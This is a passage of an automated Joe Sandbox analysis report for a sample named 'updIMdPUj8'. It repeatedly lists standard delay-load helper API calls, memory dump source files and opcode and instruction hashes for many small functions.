                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a2deff14441f2409368455b2f3cc0f5ed26448e9246468d094473b7b557397c5
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: a2deff14441f2409368455b2f3cc0f5ed26448e9246468d094473b7b557397c5
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a538efce299c4f7eb64b0edd78446318f9debd416d58aa240b431e54c9e64752
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: a538efce299c4f7eb64b0edd78446318f9debd416d58aa240b431e54c9e64752
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 328884dee95f1061662c6adbdc15b3eab00688636c89e59fd1e6322072150e4f
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: 328884dee95f1061662c6adbdc15b3eab00688636c89e59fd1e6322072150e4f
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 5e0596f7a32d57e07174d85d16bef478896ca9205712ccce575939ae39ab1276
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e0596f7a32d57e07174d85d16bef478896ca9205712ccce575939ae39ab1276
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 27ad5ab31b5165956f2ed2ec26868976d25ef87cfb71a32a1de7ccad2b55d272
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: 27ad5ab31b5165956f2ed2ec26868976d25ef87cfb71a32a1de7ccad2b55d272
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: c301aac0d3f1ff02bfadd421242d1ceb072317c638ae541f8b7fbc1a7175f9ef
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: c301aac0d3f1ff02bfadd421242d1ceb072317c638ae541f8b7fbc1a7175f9ef
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: d1cae0a9e77b25cb89d5daad16e62a277415c4e861ed1bbea23546a9900310ea
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: d1cae0a9e77b25cb89d5daad16e62a277415c4e861ed1bbea23546a9900310ea
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 9f355611856791cdda2599f09e68a6b5a240b1932ea28aed459e3a1860aadc77
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f355611856791cdda2599f09e68a6b5a240b1932ea28aed459e3a1860aadc77
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 881daaa967c762005aa99c13f4e7c637cb6953d6f868d16df9f099271ea01157
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: 881daaa967c762005aa99c13f4e7c637cb6953d6f868d16df9f099271ea01157
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          Function 00B3E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 79353dd78779f8d209ae8ab6f83a815109cf31db4945fdcd760e0c1982ce073e
                                                                                                                                                                          • Instruction ID: 71a69a0215866ce8f7eaa27c732ec72d075e42beba64a69d7d921dd207f5028a
                                                                                                                                                                          • Opcode Fuzzy Hash: 79353dd78779f8d209ae8ab6f83a815109cf31db4945fdcd760e0c1982ce073e
                                                                                                                                                                          • Instruction Fuzzy Hash: E2A012E11581017C310511001C02C3712CDC0C0B1573040DFF830A50C06C4048050432
                                                                                                                                                                          Function 00B3E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: c9720c142a66c7048754c4ee880f583cc3e4fa7175ef165a45a1022eb27ce1a9
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: c9720c142a66c7048754c4ee880f583cc3e4fa7175ef165a45a1022eb27ce1a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          Function 00B3E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 56886fde0e23ece76ef56ce005ce46c8cb46886ed4e4e3ca0db80c152c354861
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: 56886fde0e23ece76ef56ce005ce46c8cb46886ed4e4e3ca0db80c152c354861
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          Function 00B3E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
